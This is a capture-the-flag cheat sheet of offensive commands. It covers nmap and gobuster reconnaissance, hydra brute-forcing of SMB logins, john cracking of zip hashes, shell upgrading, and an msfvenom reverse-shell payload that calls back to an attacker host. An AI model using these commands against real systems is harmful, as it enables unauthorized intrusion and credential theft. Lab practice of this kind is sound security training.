A collection of tool commands and scripts for capture the flag machines
Discover common ports and their versions. Output all formats to an nmap folder
nmap -sC -sV -oA nmap/[filename] [box_ip_address]
An aggressive detection scan
nmap -T4 -A -oA nmap/[filename] [box_ip_address]
Scan all ports and write results to file in all formats
nmap -p- -oA [FILENAME] [RHOST_IP]
Scan all ports and then search through XML file results with SearchSploit to find possible exploits
nmap -p- -sV -oX [FILENAME.xml] [RHOST_IP]; searchsploit --nmap [FILENAME.xml]
Scan directories on port using list in file directory-list-2.3-medium.txt and output it to file gobuster.log
gobuster -u http://[RHOST_IP]:[PORT] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
Scan multiple directories using a for loop
for i in admin test dev backup loop; do
gobuster -u http://[RHOST_IP]:[PORT]/$i -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-$i.log
done
Enumerate on web services
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/quickhits.txt --hc '403,404' http://[RHOST_IP]/FUZZ
check for any available samba shares on the host
smbmap -H [RHOST_IP]
Connect to ftp server as anonymous user and run a command (In this example "ls") upon login
lftp -u anonymous -e "ls" [RHOST_IP]
scan smb share with a known user against a password list
hydra -l [USERNAME] -P [PASSWORDS.txt] smb://[RHOST_IP]
Reverse hex in a file
cat [HEXFILE.txt] | xxd -r -p > [DECODED_FILE.txt]
Get hash from zip file and send to an output file for cracking
zip2john [ZIPFILE.zip] > [OUTPUTFILE.zip.hash]
Crack zip file hash using wordlist rockyou.txt
john --wordlist=[/usr/share/wordlists/rockyou.txt] [OUTPUTFILE.zip.hash]
Decode base64 contained in a file
base64 -d [FILE_TO_DECODE.txt]
Wipe all whitespace including newlines
cat [FILE.txt] | tr -d " \t\n\r"
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl-z
stty raw -echo
fg
reset
Create 32-bit reverse shell for Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=[LHOST_IP] LPORT=[LHOST_PORT] -f elf -o rev
python -m SimpleHTTPServer 80